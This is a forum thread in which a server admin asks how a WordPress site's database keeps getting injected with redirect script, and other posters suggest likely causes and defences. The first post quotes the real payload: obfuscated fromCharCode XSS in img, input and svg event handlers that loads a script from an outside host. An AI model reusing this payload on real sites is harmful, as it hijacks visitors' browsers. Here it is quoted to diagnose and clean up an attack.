On my server there is one Wordpress site that has gotten several times now scripts injected in database. The script redirect browser to some unrelated site, perhaps cracker wants more traffic to that site or something. Also wordpress siteurl and home are changed, so browser goes to that other site. I have changed passwords and commanded users to be careful, but same thing happened this weekend. Any idea how this injection is done and possible? The code that is injected looks like this (I added those ### so it could not be executed by mistake): Code: <img src=x onerror=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97, 3316 115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,10 3316 1,110,100,67,104,105,108,100,40,116,41,125,40,41,59))><input autofocus onfocus=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,1 3316 16,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105 3316 ,108,100,40,116,41,125,40,41,59))><svg/onload=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34, 3316 104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59)) I created a small program that removes those added strings, but it is a bother shutdown website and clean the database.
The most likely reason is a vulnerable WP plugin. Check the access.log of the site for unusual requests and scan the website files for malware (just to be sure) that nothing got injected into files. In case you did not change the database password yet, change it trough ISPConfig and in the wp-config.php file, chmod the wp-config.php file so that it's only readable for the user of this website and not for other or for the website group.
I told the website creator to install WordFence after the first incident. At least after that the wp-config.php has not been readable group and others. Reading the access log, it may be the incident happened 5th of October. That is a bit hard to believe, this website is used actively, surely this kind of attack would be discovered the same day. Anyway, reading access logs did not reveal to me any info on how the attack was made. Maybe the user has malware on his/her workstation that does this or steals passwords. I have now again changed all passwords related to this website, including ispconfig user password.
Additionally, consider the use of a content security policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
CSP looks interesting. Is there a reason Wordpress et al do not prevent writing <script> in the blog text? Or not sanitize the blog text when sending to website visitor? Could I write in this forum message with javascript embedded and get it executed on visitors browser?
